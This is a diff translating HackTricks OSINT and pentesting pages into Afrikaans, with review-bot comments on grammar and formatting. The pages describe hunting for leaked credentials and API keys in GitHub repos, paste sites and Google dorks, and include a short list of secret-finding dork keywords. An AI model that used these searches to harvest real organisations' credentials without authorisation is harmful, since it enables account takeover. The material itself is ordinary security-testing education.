If you find **valid leaked** credentials, this is a very easy win.
|
||||
As jy geldige uitgelekte kredensiale vind, is dit 'n baie maklike oorwinning.
|
||||
|
||||
## Secrets Leaks
|
||||
## Geheimlek
|
||||
|
||||
Credential leaks are related to hacks of companies where **sensitive information was leaked and sold**. However, companies might be affected for **other leaks** whose info isn't in those databases:
|
||||
Kredensialeks is verband hou met hacks van maatskappye waarby sensitiewe inligting uitgelek en verkoop is. Maatskappye kan egter deur ander lekke geraak word waarvan die inligting nie in daardie databasisse is nie:
|
||||
|
||||
### Github Leaks
|
||||
### Github-lekke
|
||||
|
||||
Credentials and APIs might be leaked in the **public repositories** of the **company** or of the **users** working by that github company.\
|
||||
You can use the **tool** [**Leakos**](https://github.com/carlospolop/Leakos) to **download** all the **public repos** of an **organization** and of its **developers** and run [**gitleaks**](https://github.com/zricethezav/gitleaks) over them automatically.
|
||||
Kredensiale en API's kan uitgelek word in die openbare bewaarplekke van die maatskappy of van die gebruikers wat vir daardie Github-maatskappy werk. Jy kan die gereedskap [Leakos](https://github.com/carlospolop/Leakos) gebruik om al die openbare bewaarplekke van 'n organisasie en sy ontwikkelaars af te laai en outomaties [gitleaks](https://github.com/zricethezav/gitleaks) daaroor te hardloop.
|
||||
|
||||
**Leakos** can also be used to run **gitleaks** agains all the **text** provided **URLs passed** to it as sometimes **web pages also contains secrets**.
|
||||
Leakos kan ook gebruik word om gitleaks teen al die teksverskaffings-URL's wat aan hom oorgedra word, te hardloop, aangesien webbladsye soms ook geheime bevat.
|
||||
|
||||
#### Github Dorks
|
||||
|
||||
Check also this **page** for potential **github dorks** you could also search for in the organization you are attacking:
|
||||
Kyk ook na hierdie bladsy vir potensiële Github Dorks wat jy ook in die organisasie wat jy aanval, kan soek:
|
||||
|
||||
{% content-ref url="github-leaked-secrets.md" %}
|
||||
[github-leaked-secrets.md](github-leaked-secrets.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Pastes Leaks
|
||||
### Pastes-lekke
|
||||
|
||||
Sometimes attackers or just workers will **publish company content in a paste site**. This might or might not contain **sensitive information**, but it's very interesting to search for it.\
|
||||
You can use the tool [**Pastos**](https://github.com/carlospolop/Pastos) to search in more that 80 paste sites at the same time.
|
||||
Soms sal aanvallers of net werkers maatskappy-inhoud op 'n plakkerswebwerf publiseer. Dit mag wel of nie sensitiewe inligting bevat nie, maar dit is baie interessant om daarna te soek. Jy kan die gereedskap [Pastos](https://github.com/carlospolop/Pastos) gebruik om gelyktydig in meer as 80 plakkerswebwerwe te soek.
|
||||
|
||||
### Google Dorks
|
||||
|
||||
Old but gold google dorks are always useful to find **exposed information that shouldn't be there**. The only problem is that the [**google-hacking-database**](https://www.exploit-db.com/google-hacking-database) contains several **thousands** of possible queries that you cannot run manually. So, you can get your favourite 10 ones or you could use a **tool such as** [**Gorks**](https://github.com/carlospolop/Gorks) **to run them all**.
|
||||
Ou maar goeie Google Dorks is altyd nuttig om blootgestelde inligting wat nie daar behoort te wees nie, te vind. Die enigste probleem is dat die [google-hacking-database](https://www.exploit-db.com/google-hacking-database) verskeie duisende moontlike navrae bevat wat jy nie handmatig kan hardloop nie. Jy kan dus jou gunsteling 10 kies of 'n gereedskap soos [Gorks](https://github.com/carlospolop/Gorks) gebruik om hulle almal uit te voer.
|
||||
|
||||
_Note that the tools that expect to run all the database using the regular Google browser will never end as google will block you very very soon._
|
||||
Merk op dat die gereedskap wat verwag dat jy die hele databasis met die gewone Google-webblaaier hardloop, nooit sal eindig nie, aangesien Google jou baie baie gou sal blokkeer.
|
||||
|
||||
### **Looking for vulnerabilities**
|
||||
### **Op soek na kwesbaarhede**
|
||||
|
||||
If you find **valid leaked** credentials or API tokens, this is a very easy win.
|
||||
As jy geldige uitgelekte kredensiale of API-tokens vind, is dit 'n baie maklike oorwinning.
|
||||
|
||||
## Public Code Vulnerabilities
|
||||
## Openbare Kodekwesbaarhede
|
||||
|
||||
If you found that the company has **open-source code** you can **analyse** it and search for **vulnerabilities** on it.
|
||||
As jy vind dat die maatskappy oopbronkode het, kan jy dit analiseer en soek na kwesbaarhede daarin.
|
||||
|
||||
**Depending on the language** there are different **tools** you can use:
|
||||
Afhanklik van die taal is daar verskillende gereedskap wat jy kan gebruik:
|
||||
|
||||
{% content-ref url="../../network-services-pentesting/pentesting-web/code-review-tools.md" %}
|
||||
[code-review-tools.md](../../network-services-pentesting/pentesting-web/code-review-tools.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
There are also free services that allow you to **scan public repositories**, such as:
|
||||
Daar is ook gratis dienste wat jou in staat stel om openbare bewaarplekke te skandeer, soos:
|
||||
|
||||
* [**Snyk**](https://app.snyk.io/)
|
||||
* [Snyk](https://app.snyk.io/)
|
||||
## [**Pentesting Web Metodologie**](../../network-services-pentesting/pentesting-web/)
|
||||
|
||||
## [**Pentesting Web Methodology**](../../network-services-pentesting/pentesting-web/)
|
||||
Die **meerderheid van die kwesbaarhede** wat deur foutsoekers gevind word, is binne **webtoepassings**, so op hierdie punt wil ek graag praat oor 'n **webtoepassingstoetsmetodologie**, en jy kan [**hierdie inligting hier vind**](../../network-services-pentesting/pentesting-web/).
|
||||
|
||||
The **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../../network-services-pentesting/pentesting-web/).
|
||||
Ek wil ook 'n spesiale vermelding maak van die afdeling [**Web Geoutomatiseerde Skanderings oopbronhulpmiddels**](../../network-services-pentesting/pentesting-web/#automatic-scanners), want alhoewel jy nie moet verwag dat hulle baie sensitiewe kwesbaarhede sal vind nie, is hulle handig om hulle te implementeer in **werkstrome om 'n aanvanklike webinligting te verkry.**
|
||||
|
||||
I also want to do a special mention to the section [**Web Automated Scanners open source tools**](../../network-services-pentesting/pentesting-web/#automatic-scanners), as, if you shouldn't expect them to find you very sensitive vulnerabilities, they come handy to implement them on **workflows to have some initial web information.**
|
||||
## Opsomming
|
||||
|
||||
## Recapitulation
|
||||
> Gelukwens! Op hierdie punt het jy reeds **alle basiese opname** uitgevoer. Ja, dit is basies omdat daar nog baie meer opname gedoen kan word (ons sal later meer truuks sien).
|
||||
|
||||
> Congratulations! At this point you have already perform **all the basic enumeration**. Yes, it's basic because a lot more enumeration can be done (will see more tricks later).
|
||||
Jy het reeds:
|
||||
|
||||
So you have already:
|
||||
1. Al die **maatskappye** binne die omvang gevind
|
||||
2. Al die **bates** wat aan die maatskappye behoort, gevind (en 'n paar kwesbaarheidsskanderings uitgevoer as dit binne die omvang val)
|
||||
3. Al die **domeine** wat aan die maatskappye behoort, gevind
|
||||
4. Al die **subdomeine** van die domeine gevind (enige subdomein-oorgawe?)
|
||||
5. Al die **IP's** (van en **nie van CDN's**) binne die omvang gevind.
|
||||
6. Al die **webbedieners** gevind en 'n **skermkiekie** van hulle geneem (enige iets vreemds wat 'n dieper kyk werd is?)
|
||||
7. Al die **potensiële openbare wolkbates** wat aan die maatskappy behoort, gevind.
|
||||
8. **E-posse**, **geloofsbriewe-lekke** en **geheimlekkasies** wat jou 'n **groot wen baie maklik** kan gee.
|
||||
9. **Pentesting van al die webwerwe wat jy gevind het**
|
||||
|
||||
1. Found all the **companies** inside the scope
|
||||
2. Found all the **assets** belonging to the companies (and perform some vuln scan if in scope)
|
||||
3. Found all the **domains** belonging to the companies
|
||||
4. Found all the **subdomains** of the domains (any subdomain takeover?)
|
||||
5. Found all the **IPs** (from and **not from CDNs**) inside the scope.
|
||||
6. Found all the **web servers** and took a **screenshot** of them (anything weird worth a deeper look?)
|
||||
7. Found all the **potential public cloud assets** belonging to the company.
|
||||
8. **Emails**, **credentials leaks**, and **secret leaks** that could give you a **big win very easily**.
|
||||
9. **Pentesting all the webs you found**
|
||||
## **Volledige Opname Outomatiese Hulpmiddels**
|
||||
|
||||
## **Full Recon Automatic Tools**
|
||||
|
||||
There are several tools out there that will perform part of the proposed actions against a given scope.
|
||||
Daar is verskeie hulpmiddels beskikbaar wat 'n deel van die voorgestelde aksies teen 'n gegewe omvang sal uitvoer.
|
||||
|
||||
* [**https://github.com/yogeshojha/rengine**](https://github.com/yogeshojha/rengine)
|
||||
* [**https://github.com/j3ssie/Osmedeus**](https://github.com/j3ssie/Osmedeus)
|
||||
* [**https://github.com/six2dez/reconftw**](https://github.com/six2dez/reconftw)
|
||||
* [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - A little old and not updated
|
||||
* [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - 'n Bietjie oud en nie opgedateer nie
|
||||
|
||||
## **References**
|
||||
## **Verwysings**
|
||||
|
||||
* All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
|
||||
* Alle gratis kursusse van [**@Jhaddix**](https://twitter.com/Jhaddix) soos [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
|
||||
|
||||
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
|
|
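Review bot: the translated Public Cloud Assets paragraph drops the code formatting around the keyword list. The English line keeps `"crypto", "wallet", "dao", "<domain_name>", <"subdomain_names">` inside backticks, but the Afrikaans line `Byvoorbeeld, vir 'n kriptomaatskappy kan jy woorde soos "crypto", "wallet", "dao", "<domain_name>", "<subdomain_names>" gebruik.` has none, so renderers that allow inline HTML will treat `<domain_name>` and `<subdomain_names>` as tags and swallow them; restore the backticks. Two headings in this hunk are malformed: `## Kredensialek` and `## Geheimlek` should be `## Kredensiale-lekke` and `## Geheimlekke`, matching the plural English `Credential Leaks` / `Secrets Leaks` and the `Github-lekke` / `Pastes-lekke` headings later in the same file, and the sentence `Kredensialeks is verband hou met hacks van maatskappye` needs its verb fixed (`Kredensiale-lekke hou verband met ...`). The conditional in the subdomain section has no main verb: `As jy enige subdomein met 'n ander IP as diegene wat jy reeds in die batesontdekking gevind het, moet jy ...` needs `vind` (or `teëkom`) before `, moet jy`. The Certificate Transparency sentence keeps the English garble and adds a misspelling: `deur die Sertifikaat Transparancy Logboeke te monitor [sublert](...)doen` should read `deur die Certificate Transparency-logboeke te monitor, soos [sublert](...) doen`, with the proper name left untranslated. Terminology also drifts within the file: `Skermfoto's` in the heading vs `skermkiekie` in the recap, `kredensiale` vs `geloofsbriewe-lekke`, and `emmer` / `S3-emmer` for bucket even though the linked buckets page and the AWS term are `bucket`; pick one rendering for each and use it throughout.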
@ -2,30 +2,30 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits.
|
||||
Nou dat ons die lys van bates in ons omvang gebou het, is dit tyd om te soek na sommige OSINT-laaghangende vrugte.
|
||||
|
||||
### Platforms that already searched for leaks
|
||||
### Platforms wat reeds na lekke gesoek het
|
||||
|
||||
* [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/)
|
||||
|
||||
### Api keys leaks in github
|
||||
### Api-sleutellekke in github
|
||||
|
||||
* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog)
|
||||
* [https://github.com/gitleaks/gitleaks](https://github.com/gitleaks/gitleaks)
|
||||
|
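Review bot: `### Api-sleutellekke in github` carries the lower-case `Api` and `github` over from the English heading; since the line is being rewritten anyway, make it `### API-sleutellekke in GitHub`, in line with how the rest of this commit keeps acronyms and product names as-is (`AWS`, `HackTricks`, `Intigriti`). In `is dit tyd om te soek na sommige OSINT-laaghangende vrugte`, `OSINT` is hyphenated onto the adjective instead of the noun; `laaghangende OSINT-vrugte` (or `maklike OSINT-wenne`) reads naturally. The heading `### Platforms wat reeds na lekke gesoek het` is fine.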
@ -40,7 +40,6 @@ Now that we have built the list of assets of our scope it's time to search for s
|
|||
* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker)
|
||||
|
||||
### **Dorks**
|
||||
|
||||
```bash
|
||||
".mlab.com password"
|
||||
"access_key"
|
||||
|
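Review bot: this hunk is a whitespace-only change (`-40,7 +40,6`) in a commit that otherwise only translates text, dropping one blank line around `### **Dorks**`. Confirm the line removed is not the blank between the `* [https://github.com/obheda12/GitDorker]` bullet and the heading, since CommonMark needs that blank to close the list before the heading starts; if it is the blank after the heading, the change is harmless but should still be called out in the commit message rather than slipped into a translation commit.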
@ -322,17 +321,16 @@ GCP SECRET
|
|||
AWS SECRET
|
||||
"private" extension:pgp
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
|
|
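Review bot: the shared HackTricks footer is translated differently from file to file in this same commit; here it reads `github-opslagplekke` and keeps `SUBSCRIPTION PLANS` in English, while the Wide Source Code Search file uses `GitHub-opslagplekke`, the Pentesting Methodology header uses `github-repos` and its footer uses `github-opslag` and `SUBSKRIPSIEPLANNE`. Since this block is boilerplate repeated on every page, translate it once and paste the same text everywhere so later bulk edits can match it reliably.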
@ -1,43 +1,43 @@
|
|||
# Wide Source Code Search
|
||||
# Wydse Bronkode Soektog
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
The goal of this page is to enumerate **platforms that allow to search for code** (literal or regex) in across thousands/millions of repos in one or more platforms.
|
||||
Die doel van hierdie bladsy is om **platforms op te som wat soektogte vir kode** (letterlik of regex) in duisende/miljoene opslagplekke op een of meer platforms toelaat.
|
||||
|
||||
This helps in several occasions to **search for leaked information** or for **vulnerabilities** patterns.
|
||||
Dit help in verskeie gevalle om te **soek na uitgelekde inligting** of na **kwesbaarheidspatrone**.
|
||||
|
||||
* [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes.
|
||||
* [**Github Search**](https://github.com/search): Search across Github. It supports regexes.
|
||||
* Maybe it's also useful to check also [**Github Code Search**](https://cs.github.com/).
|
||||
* [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Search across Gitlab projects. Support regexes.
|
||||
* [**SearchCode**](https://searchcode.com/): Search code in millions of projects.
|
||||
* [**SourceGraph**](https://sourcegraph.com/search): Soek in miljoene opslagplekke. Daar is 'n gratis weergawe en 'n ondernemingsweergawe (met 15 dae gratis). Dit ondersteun regexes.
|
||||
* [**Github Soektog**](https://github.com/search): Soek deur Github. Dit ondersteun regexes.
|
||||
* Dit mag ook nuttig wees om ook [**Github Kodesoektog**](https://cs.github.com/) te kyk.
|
||||
* [**Gitlab Gevorderde Soektog**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Soek deur Gitlab-projekte. Ondersteun regexes.
|
||||
* [**SearchCode**](https://searchcode.com/): Soek kode in miljoene projekte.
|
||||
|
||||
{% hint style="warning" %}
|
||||
When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!
|
||||
Wanneer jy na lekke in 'n opslagplek soek en iets soos `git log -p` hardloop, moenie vergeet dat daar dalk **ander takke met ander commits** wat geheime bevat nie!
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
|
|
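Review bot: the new title `# Wydse Bronkode Soektog` is not grammatical Afrikaans; the attributive form of `wyd` is `wye`, so `# Wye Bronkode-soektog` reads correctly and matches the compound style used further down in the same hunk (`Kodesoektog`, `Gevorderde Soektog`). The bullet `Dit mag ook nuttig wees om ook [**Github Kodesoektog**](https://cs.github.com/) te kyk` doubles `ook` (carried over from the doubled "also" in the English line) and wants `na ... te kyk`; dropping the second `ook` fixes both.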
@ -1,176 +1,175 @@
|
|||
# Pentesting Methodology
|
||||
# Pentesting Metodologie
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
